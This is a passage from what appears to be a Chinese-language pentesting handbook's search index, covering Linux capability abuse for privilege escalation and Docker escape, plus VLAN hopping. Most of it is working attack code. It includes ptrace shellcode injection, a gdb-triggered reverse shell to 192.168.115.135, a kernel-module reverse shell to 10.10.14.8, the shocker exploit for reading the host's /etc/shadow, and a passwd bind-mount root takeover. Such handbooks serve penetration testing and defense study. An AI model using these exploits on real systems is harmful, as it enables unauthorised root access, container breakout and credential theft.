compiled binary\\n* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient\\n*\\n* To get a shell with additional caps that can be inherited do:\\n*\\n* ./ambient /bin/bash\\n*/ #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include static void set_ambient_cap(int cap) {\\nint rc;\\ncapng_get_caps_process();\\nrc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);\\nif (rc) {\\nprintf(\\"Cannot add inheritable cap\\\\n\\");\\nexit(2);\\n}\\ncapng_apply(CAPNG_SELECT_CAPS);\\n/* Note the two 0s at the end. Kernel checks for these */\\nif (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {\\nperror(\\"Cannot set cap\\");\\nexit(1);\\n}\\n}\\nvoid usage(const char * me) {\\nprintf(\\"Usage: %s [-c caps] new-program new-args\\\\n\\", me);\\nexit(1);\\n}\\nint default_caplist[] = {\\nCAP_NET_RAW,\\nCAP_NET_ADMIN,\\nCAP_SYS_NICE,\\n-1\\n};\\nint * get_caplist(const char * arg) {\\nint i = 1;\\nint * list = NULL;\\nchar * dup = strdup(arg), * tok;\\nfor (tok = strtok(dup, \\",\\"); tok; tok = strtok(NULL, \\",\\")) {\\nlist = realloc(list, (i + 1) * sizeof(int));\\nif (!list) {\\nperror(\\"out of memory\\");\\nexit(1);\\n}\\nlist[i - 1] = atoi(tok);\\nlist[i] = -1;\\ni++;\\n}\\nreturn list;\\n}\\nint main(int argc, char ** argv) {\\nint rc, i, gotcaps = 0;\\nint * caplist = NULL;\\nint index = 1; // argv index for cmd to start\\nif (argc < 2)\\nusage(argv[0]);\\nif (strcmp(argv[1], \\"-c\\") == 0) {\\nif (argc <= 3) {\\nusage(argv[0]);\\n}\\ncaplist = get_caplist(argv[2]);\\nindex = 3;\\n}\\nif (!caplist) {\\ncaplist = (int * ) default_caplist;\\n}\\nfor (i = 0; caplist[i] != -1; i++) {\\nprintf(\\"adding %d to ambient list\\\\n\\", caplist[i]);\\nset_ambient_cap(caplist[i]);\\n}\\nprintf(\\"Ambient forking shell\\\\n\\");\\nif (execv(argv[index], argv + index))\\nperror(\\"Cannot exec\\");\\nreturn 0;\\n} bash gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c\\nsudo setcap 
cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient\\n./ambient /bin/bash 在 由编译的环境二进制文件执行的bash内部 ,可以观察到 新的能力 (普通用户在“当前”部分不会有任何能力)。 bash capsh --print\\nCurrent: = cap_net_admin,cap_net_raw,cap_sys_nice+eip caution 你 只能添加在 允许和继承集合中 存在的能力 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Environment Capabilities","id":"1839","title":"Environment Capabilities"},"184":{"body":"如果攻击者位于 native (untagged) VLAN ,则带有 两个 802.1Q 头的构造帧可以跳转到第二个 VLAN,即使端口被锁定在接入模式。 工具如 VLANPWN DoubleTagging.py (2022-2025 刷新) 自动化了注入: bash python3 DoubleTagging.py \\\\\\n--interface eth0 \\\\\\n--nativevlan 1 \\\\\\n--targetvlan 20 \\\\\\n--victim 10.10.20.24 \\\\\\n--attacker 10.10.1.54","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 2. 双重标记 (Native-VLAN 滥用)","id":"184","title":"2. 双重标记 (Native-VLAN 滥用)"},"1840":{"body":"能力感知的二进制文件不会使用环境中提供的新能力 ,然而 能力无知的二进制文件会使用它们 ,因为它们不会拒绝这些能力。这使得能力无知的二进制文件在一个授予二进制文件能力的特殊环境中变得脆弱。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 能力感知/能力无知的二进制文件","id":"1840","title":"能力感知/能力无知的二进制文件"},"1841":{"body":"默认情况下, 以root身份运行的服务将被分配所有能力 ,在某些情况下这可能是危险的。 因此, 服务配置 文件允许 指定 你希望它拥有的 能力 , 以及 应该执行该服务的 用户 ,以避免以不必要的权限运行服务: bash [Service]\\nUser=bob\\nAmbientCapabilities=CAP_NET_BIND_SERVICE","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 服务能力","id":"1841","title":"服务能力"},"1842":{"body":"默认情况下,Docker 为容器分配了一些能力。通过运行以下命令,可以很容易地检查这些能力: bash docker run --rm -it r.j3ss.co/amicontained bash\\nCapabilities:\\nBOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap # Add a capabilities\\ndocker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash # Add all capabilities\\ndocker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash # Remove all and add only one\\ndocker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Docker 
容器中的能力","id":"1842","title":"Docker 容器中的能力"},"1843":{"body":"Capabilities 在你 想要在执行特权操作后限制自己的进程 (例如,在设置 chroot 和绑定到套接字后)时非常有用。然而,它们可以通过传递恶意命令或参数来被利用,这些命令或参数随后以 root 身份运行。 你可以使用 setcap 强制程序获得能力,并使用 getcap 查询这些能力: bash #Set Capability\\nsetcap cap_net_raw+ep /sbin/ping #Get Capability\\ngetcap /sbin/ping\\n/sbin/ping = cap_net_raw+ep +ep 表示您正在将能力添加为有效和允许(“-”将移除它)。 要识别系统或文件夹中具有能力的程序: bash getcap -r / 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » Privesc/Container Escape","id":"1843","title":"Privesc/Container Escape"},"1844":{"body":"在以下示例中,发现二进制文件 /usr/bin/python2.6 存在提权漏洞: bash setcap cap_setuid+ep /usr/bin/python2.7\\n/usr/bin/python2.7 = cap_setuid+ep #Exploit\\n/usr/bin/python2.7 -c \'import os; os.setuid(0); os.system(\\"/bin/bash\\");\' tcpdump 所需的 能力 以 允许任何用户嗅探数据包 : bash setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump\\ngetcap /usr/sbin/tcpdump\\n/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 利用示例","id":"1844","title":"利用示例"},"1845":{"body":"来自文档 :请注意,可以将空能力集分配给程序文件,因此可以创建一个设置用户ID为root的程序,该程序将执行该程序的进程的有效和保存的用户ID更改为0,但不会赋予该进程任何能力。简单来说,如果你有一个二进制文件: 不属于root 没有设置 SUID/SGID 位 设置了空能力(例如:getcap myelf 返回 myelf =ep) 那么 该二进制文件将以root身份运行 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » \\"空\\" 能力的特殊情况","id":"1845","title":"\\"空\\" 能力的特殊情况"},"1846":{"body":"CAP_SYS_ADMIN 是一种非常强大的Linux能力,通常被视为接近root级别,因为它具有广泛的 管理权限 ,例如挂载设备或操纵内核特性。虽然在模拟整个系统的容器中不可或缺,但**CAP_SYS_ADMIN 带来了重大的安全挑战**,特别是在容器化环境中,因为它可能导致特权提升和系统妥协。因此,其使用需要严格的安全评估和谨慎管理,强烈建议在特定应用的容器中放弃此能力,以遵循 最小特权原则 并最小化攻击面。 带有二进制文件的示例 bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_admin+ep 使用 Python,您可以将修改过的 passwd 文件挂载到真实的 passwd 文件上: bash cp /etc/passwd ./ #Create a copy of the passwd file\\nopenssl passwd -1 -salt abc password #Get hash of \\"password\\"\\nvim ./passwd #Change roots passwords of the fake passwd file 最后 挂载 修改后的 passwd 文件到 /etc/passwd: python from ctypes import *\\nlibc = 
CDLL(\\"libc.so.6\\")\\nlibc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)\\nMS_BIND = 4096\\nsource = b\\"/path/to/fake/passwd\\"\\ntarget = b\\"/etc/passwd\\"\\nfilesystemtype = b\\"none\\"\\noptions = b\\"rw\\"\\nmountflags = MS_BIND\\nlibc.mount(source, target, filesystemtype, mountflags, options) 您将能够 su 为 root ,使用密码 \\"password\\"。 带环境的示例(Docker 突破) 您可以使用以下命令检查 Docker 容器内启用的能力: capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 SYS_ADMIN 能力已启用。 挂载 这允许 docker 容器 挂载主机磁盘并自由访问 : bash fdisk -l #Get disk name\\nDisk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors\\nUnits: sectors of 1 * 512 = 512 bytes\\nSector size (logical/physical): 512 bytes / 512 bytes\\nI/O size (minimum/optimal): 512 bytes / 
512 bytes mount /dev/sda /mnt/ #Mount it\\ncd /mnt\\nchroot ./ bash #You have a shell inside the docker hosts disk 完全访问 在之前的方法中,我们成功访问了docker主机磁盘。 如果您发现主机正在运行 ssh 服务器,您可以 在docker主机 磁盘中创建一个用户,并通过SSH访问它: bash #Like in the example before, the first step is to mount the docker host disk\\nfdisk -l\\nmount /dev/sda /mnt/ #Then, search for open ports inside the docker host\\nnc -v -n -w2 -z 172.17.0.1 1-65535\\n(UNKNOWN) [172.17.0.1] 2222 (?) open #Finally, create a new user inside the docker host and use it to access via SSH\\nchroot /mnt/ adduser john\\nssh john@172.17.0.1 -p 2222","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_ADMIN","id":"1846","title":"CAP_SYS_ADMIN"},"1847":{"body":"这意味着您可以通过在主机上运行的某个进程中注入 shellcode 来逃离容器。 要访问主机上运行的进程,容器需要至少以 --pid=host 运行。 CAP_SYS_PTRACE 授予使用 ptrace(2) 提供的调试和系统调用跟踪功能的能力,以及像 process_vm_readv(2) 和 process_vm_writev(2) 这样的跨内存附加调用。尽管对于诊断和监控目的非常强大,但如果在没有像 seccomp 过滤器这样的限制措施的情况下启用 CAP_SYS_PTRACE,可能会显著削弱系统安全性。具体来说,它可以被利用来规避其他安全限制,特别是 seccomp 强加的限制,正如 这样的概念验证 (PoC) 所示。 使用二进制文件的示例 (python) bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_ptrace+ep python import ctypes\\nimport sys\\nimport struct\\n# Macros defined in \\n# https://code.woboq.org/qt5/include/sys/ptrace.h.html\\nPTRACE_POKETEXT = 4\\nPTRACE_GETREGS = 12\\nPTRACE_SETREGS = 13\\nPTRACE_ATTACH = 16\\nPTRACE_DETACH = 17\\n# Structure defined in \\n# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct\\nclass user_regs_struct(ctypes.Structure):\\n_fields_ = [\\n(\\"r15\\", ctypes.c_ulonglong),\\n(\\"r14\\", ctypes.c_ulonglong),\\n(\\"r13\\", ctypes.c_ulonglong),\\n(\\"r12\\", ctypes.c_ulonglong),\\n(\\"rbp\\", ctypes.c_ulonglong),\\n(\\"rbx\\", ctypes.c_ulonglong),\\n(\\"r11\\", ctypes.c_ulonglong),\\n(\\"r10\\", ctypes.c_ulonglong),\\n(\\"r9\\", ctypes.c_ulonglong),\\n(\\"r8\\", ctypes.c_ulonglong),\\n(\\"rax\\", ctypes.c_ulonglong),\\n(\\"rcx\\", ctypes.c_ulonglong),\\n(\\"rdx\\", ctypes.c_ulonglong),\\n(\\"rsi\\", 
ctypes.c_ulonglong),\\n(\\"rdi\\", ctypes.c_ulonglong),\\n(\\"orig_rax\\", ctypes.c_ulonglong),\\n(\\"rip\\", ctypes.c_ulonglong),\\n(\\"cs\\", ctypes.c_ulonglong),\\n(\\"eflags\\", ctypes.c_ulonglong),\\n(\\"rsp\\", ctypes.c_ulonglong),\\n(\\"ss\\", ctypes.c_ulonglong),\\n(\\"fs_base\\", ctypes.c_ulonglong),\\n(\\"gs_base\\", ctypes.c_ulonglong),\\n(\\"ds\\", ctypes.c_ulonglong),\\n(\\"es\\", ctypes.c_ulonglong),\\n(\\"fs\\", ctypes.c_ulonglong),\\n(\\"gs\\", ctypes.c_ulonglong),\\n] libc = ctypes.CDLL(\\"libc.so.6\\") pid=int(sys.argv[1]) # Define argument type and respone type.\\nlibc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]\\nlibc.ptrace.restype = ctypes.c_uint64 # Attach to the process\\nlibc.ptrace(PTRACE_ATTACH, pid, None, None)\\nregisters=user_regs_struct() # Retrieve the value stored in registers\\nlibc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))\\nprint(\\"Instruction Pointer: \\" + hex(registers.rip))\\nprint(\\"Injecting Shellcode at: \\" + hex(registers.rip)) # Shell code copied from exploit db. 
https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c\\nshellcode = \\"\\\\x48\\\\x31\\\\xc0\\\\x48\\\\x31\\\\xd2\\\\x48\\\\x31\\\\xf6\\\\xff\\\\xc6\\\\x6a\\\\x29\\\\x58\\\\x6a\\\\x02\\\\x5f\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x6a\\\\x02\\\\x66\\\\xc7\\\\x44\\\\x24\\\\x02\\\\x15\\\\xe0\\\\x54\\\\x5e\\\\x52\\\\x6a\\\\x31\\\\x58\\\\x6a\\\\x10\\\\x5a\\\\x0f\\\\x05\\\\x5e\\\\x6a\\\\x32\\\\x58\\\\x0f\\\\x05\\\\x6a\\\\x2b\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x6a\\\\x03\\\\x5e\\\\xff\\\\xce\\\\xb0\\\\x21\\\\x0f\\\\x05\\\\x75\\\\xf8\\\\xf7\\\\xe6\\\\x52\\\\x48\\\\xbb\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x53\\\\x48\\\\x8d\\\\x3c\\\\x24\\\\xb0\\\\x3b\\\\x0f\\\\x05\\" # Inject the shellcode into the running process byte by byte.\\nfor i in xrange(0,len(shellcode),4):\\n# Convert the byte to little endian.\\nshellcode_byte_int=int(shellcode[i:4+i].encode(\'hex\'),16)\\nshellcode_byte_little_endian=struct.pack(\\" commands.gdb\\n# In this case there was a sleep run by root\\n## NOTE that the process you abuse will die after the shellcode\\n/usr/bin/gdb -p $(pgrep sleep)\\n[...]\\n(gdb) source commands.gdb\\nContinuing.\\nprocess 207009 is executing new program: /usr/bin/dash\\n[...] 
带环境的示例(Docker 突破) - 另一个 gdb 滥用 如果 GDB 已安装(或者你可以通过 apk add gdb 或 apt install gdb 等安装它),你可以 从主机调试一个进程 并使其调用 system 函数。(此技术还需要能力 SYS_ADMIN) 。 bash gdb -p 1234\\n(gdb) call (void)system(\\"ls\\")\\n(gdb) call (void)system(\\"sleep 5\\")\\n(gdb) call (void)system(\\"bash -c \'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1\'\\") 您将无法看到执行命令的输出,但该进程将执行该命令(因此获取反向 shell)。 warning 如果您收到错误 \\"No symbol \\"system\\" in current context.\\",请检查通过 gdb 在程序中加载 shellcode 的前一个示例。 带环境的示例(Docker 逃逸) - Shellcode 注入 您可以使用以下命令检查 docker 容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root 列出 主机 中运行的 进程 ps -eaf 获取 架构 uname -m 查找适用于该架构的 shellcode ( https://www.exploit-db.com/exploits/41128 ) 查找一个 程序 将 shellcode 注入到进程内存中 ( https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c ) 修改 程序中的 shellcode 并 编译 它 gcc inject.c -o inject 注入 并获取你的 shell : ./inject 299; nc 172.17.0.1 5600","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_PTRACE","id":"1847","title":"CAP_SYS_PTRACE"},"1848":{"body":"CAP_SYS_MODULE 使进程能够 加载和卸载内核模块 (init_module(2)、finit_module(2) 和 delete_module(2) 系统调用) ,提供对内核核心操作的直接访问。此能力带来了严重的安全风险,因为它允许特权升级和完全系统妥协,通过允许对内核的修改,从而绕过所有 Linux 安全机制,包括 Linux 安全模块和容器隔离。 这意味着你可以 在主机的内核中插入/移除内核模块。 带有二进制文件的示例 在以下示例中,二进制文件 python 拥有此能力。 bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_module+ep 默认情况下, modprobe 命令会检查目录 /lib/modules/$(uname -r) 中的依赖列表和映射文件。 为了利用这一点,让我们创建一个假的 lib/modules 文件夹: bash 
mkdir lib/modules -p\\ncp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) 然后 编译内核模块,您可以在下面找到两个示例,并将其复制 到此文件夹: bash cp reverse-shell.ko lib/modules/$(uname -r)/ 最后,执行所需的python代码以加载此内核模块: python import kmod\\nkm = kmod.Kmod()\\nkm.set_mod_dir(\\"/path/to/fake/lib/modules/5.0.0-20-generic/\\")\\nkm.modprobe(\\"reverse-shell\\") 示例 2:带二进制文件 在以下示例中,二进制文件 kmod 具有此能力。 bash getcap -r / 2>/dev/null\\n/bin/kmod = cap_sys_module+ep 这意味着可以使用命令 insmod 插入内核模块。按照下面的示例获取一个 reverse shell ,利用这个特权。 带环境的示例(Docker 突破) 您可以使用以下命令检查 Docker 容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 SYS_MODULE 权限已启用。 创建 将执行反向 shell 的 内核模块 和 Makefile 以 编译 它: reverse-shell.c #include \\n#include \\nMODULE_LICENSE(\\"GPL\\");\\nMODULE_AUTHOR(\\"AttackDefense\\");\\nMODULE_DESCRIPTION(\\"LKM reverse shell module\\");\\nMODULE_VERSION(\\"1.0\\"); char* argv[] = {\\"/bin/bash\\",\\"-c\\",\\"bash -i >& /dev/tcp/10.10.14.8/4444 0>&1\\", NULL};\\nstatic char* envp[] = {\\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\\", NULL }; // call_usermodehelper function is used to create user mode processes from kernel space\\nstatic int __init reverse_shell_init(void) {\\nreturn call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);\\n} static void __exit reverse_shell_exit(void) {\\nprintk(KERN_INFO \\"Exiting\\\\n\\");\\n} module_init(reverse_shell_init);\\nmodule_exit(reverse_shell_exit); Makefile obj-m 
+=reverse-shell.o all:\\nmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean:\\nmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean warning Makefile 中每个 make 单词前的空白字符 必须是制表符,而不是空格 ! 执行 make 进行编译。 bash Make[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update\\nsudo apt full-upgrade 最后,在一个 shell 中启动 nc,并从另一个 shell 中 加载模块 ,你将会在 nc 进程中捕获到 shell: bash #Shell 1\\nnc -lvnp 4444 #Shell 2\\ninsmod reverse-shell.ko #Launch the reverse shell 该技术的代码来自于“滥用SYS_MODULE能力”的实验室 https://www.pentesteracademy.com/ 该技术的另一个示例可以在 https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host 中找到。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_MODULE","id":"1848","title":"CAP_SYS_MODULE"},"1849":{"body":"CAP_DAC_READ_SEARCH 使进程能够 绕过读取文件和读取及执行目录的权限 。它的主要用途是用于文件搜索或读取。然而,它还允许进程使用 open_by_handle_at(2) 函数,该函数可以访问任何文件,包括那些在进程的挂载命名空间之外的文件。在 open_by_handle_at(2) 中使用的句柄应该是通过 name_to_handle_at(2) 获得的非透明标识符,但它可以包含易受篡改的敏感信息,如 inode 号。Sebastian Krahmer 通过 shocker 漏洞展示了这种能力的潜在利用,特别是在 Docker 容器的上下文中,分析见 这里 。 这意味着您可以 绕过文件读取权限检查和目录读取/执行权限检查。 带有二进制文件的示例 该二进制文件将能够读取任何文件。因此,如果像 tar 这样的文件具有此能力,它将能够读取 shadow 文件: bash cd /etc\\ntar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp\\ncd /tmp\\ntar -cxf shadow.tar.gz Example with binary2 在这种情况下,假设 python 二进制文件具有此能力。为了列出根文件,您可以执行: python import os\\nfor r, d, f in os.walk(\'/root\'):\\nfor filename in f:\\nprint(filename) 为了读取文件,你可以这样做: python print(open(\\"/etc/shadow\\", \\"r\\").read()) 示例环境(Docker突破) 您可以使用以下命令检查Docker容器内启用的能力: capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set 
=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 DAC_READ_SEARCH 权限已启用。因此,容器可以 调试进程 。 您可以在 https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3 学习以下利用是如何工作的,但简而言之, CAP_DAC_READ_SEARCH 不仅允许我们在没有权限检查的情况下遍历文件系统,还明确移除了对 open_by_handle_at(2) 的任何检查,并且 可能允许我们的进程访问其他进程打开的敏感文件 。 滥用此权限从主机读取文件的原始利用可以在这里找到: http://stealth.openwall.net/xSports/shocker.c ,以下是一个 修改版本,允许您将要读取的文件作为第一个参数指示,并将其转储到文件中。 c #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include // gcc shocker.c -o shocker\\n// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir struct my_file_handle {\\nunsigned int handle_bytes;\\nint handle_type;\\nunsigned char f_handle[8];\\n}; void die(const char *msg)\\n{\\nperror(msg);\\nexit(errno);\\n} void dump_handle(const struct my_file_handle *h)\\n{\\nfprintf(stderr,\\"[*] #=%d, %d, char nh[] = {\\", h->handle_bytes,\\nh->handle_type);\\nfor (int i = 0; i < h->handle_bytes; ++i) {\\nfprintf(stderr,\\"0x%02x\\", h->f_handle[i]);\\nif ((i + 1) % 20 == 0)\\nfprintf(stderr,\\"\\\\n\\");\\nif (i < h->handle_bytes - 1)\\nfprintf(stderr,\\", \\");\\n}\\nfprintf(stderr,\\"};\\\\n\\");\\n} int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle\\n*oh)\\n{\\nint fd;\\nuint32_t ino = 0;\\nstruct my_file_handle outh = {\\n.handle_bytes = 8,\\n.handle_type = 1\\n};\\nDIR *dir = NULL;\\nstruct dirent *de = NULL;\\npath = strchr(path, \'/\');\\n// recursion stops if path has been resolved\\nif (!path) {\\nmemcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));\\noh->handle_type 
= 1;\\noh->handle_bytes = 8;\\nreturn 1;\\n} ++path;\\nfprintf(stderr, \\"[*] Resolving \'%s\'\\\\n\\", path);\\nif ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle_at\\");\\nif ((dir = fdopendir(fd)) == NULL)\\ndie(\\"[-] fdopendir\\");\\nfor (;;) {\\nde = readdir(dir);\\nif (!de)\\nbreak;\\nfprintf(stderr, \\"[*] Found %s\\\\n\\", de->d_name);\\nif (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {\\nfprintf(stderr, \\"[+] Match: %s ino=%d\\\\n\\", de->d_name, (int)de->d_ino);\\nino = de->d_ino;\\nbreak;\\n}\\n} fprintf(stderr, \\"[*] Brute forcing remaining 32bit. This can take a while...\\\\n\\");\\nif (de) {\\nfor (uint32_t i = 0; i < 0xffffffff; ++i) {\\nouth.handle_bytes = 8;\\nouth.handle_type = 1;\\nmemcpy(outh.f_handle, &ino, sizeof(ino));\\nmemcpy(outh.f_handle + 4, &i, sizeof(i));\\nif ((i % (1<<20)) == 0)\\nfprintf(stderr, \\"[*] (%s) Trying: 0x%08x\\\\n\\", de->d_name, i);\\nif (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {\\nclosedir(dir);\\nclose(fd);\\ndump_handle(&outh);\\nreturn find_handle(bfd, path, &outh, oh);\\n}\\n}\\n}\\nclosedir(dir);\\nclose(fd);\\nreturn 0;\\n} int main(int argc,char* argv[] )\\n{\\nchar buf[0x1000];\\nint fd1, fd2;\\nstruct my_file_handle h;\\nstruct my_file_handle root_h = {\\n.handle_bytes = 8,\\n.handle_type = 1,\\n.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}\\n}; fprintf(stderr, \\"[***] docker VMM-container breakout Po(C) 2014 [***]\\\\n\\"\\n\\"[***] The tea from the 90\'s kicks your sekurity again. [***]\\\\n\\"\\n\\"[***] If you have pending sec consulting, I\'ll happily [***]\\\\n\\"\\n\\"[***] forward to my friends who drink secury-tea too! [***]\\\\n\\\\n\\\\n\\"); read(0, buf, 1); // get a FS reference from something mounted in from outside\\nif ((fd1 = open(\\"/etc/hostname\\", O_RDONLY)) < 0)\\ndie(\\"[-] open\\"); if (find_handle(fd1, argv[1], &root_h, &h) <= 0)\\ndie(\\"[-] Cannot find valid handle!\\"); fprintf(stderr, \\"[!] 
Got a final handle!\\\\n\\");\\ndump_handle(&h); if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle\\"); memset(buf, 0, sizeof(buf));\\nif (read(fd2, buf, sizeof(buf) - 1) < 0)\\ndie(\\"[-] read\\"); printf(\\"Success!!\\\\n\\"); FILE *fptr;\\nfptr = fopen(argv[2], \\"w\\");\\nfprintf(fptr,\\"%s\\", buf);\\nfclose(fptr); close(fd2); close(fd1); return 0;\\n} warning 利用程序需要找到指向主机上某个挂载内容的指针。原始利用程序使用文件 /.dockerinit,而这个修改版本使用 /etc/hostname。如果利用程序无法工作,您可能需要设置不同的文件。要找到在主机上挂载的文件,只需执行 mount 命令: 该技术的代码来自于“滥用 DAC_READ_SEARCH 能力”的实验室 https://www.pentesteracademy.com/","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_DAC_READ_SEARCH","id":"1849","title":"CAP_DAC_READ_SEARCH"},"185":{"body":"许多企业核心支持 Q-in-Q 服务提供商封装。在允许的情况下,攻击者可以在提供商 (S-tag) 内隧道任意的 802.1Q 标记流量,以跨越安全区域。捕获以 ethertype 0x88a8 并尝试使用 Scapy 弹出外部标签: python from scapy.all import *\\nouter = 100 # Service tag\\ninner = 30 # Customer / target VLAN\\npayload = Ether(dst=\\"ff:ff:ff:ff:ff:ff\\")/Dot1Q(vlan=inner)/IP(dst=\\"10.10.30.1\\")/ICMP()\\nframe = Dot1Q(type=0x88a8, 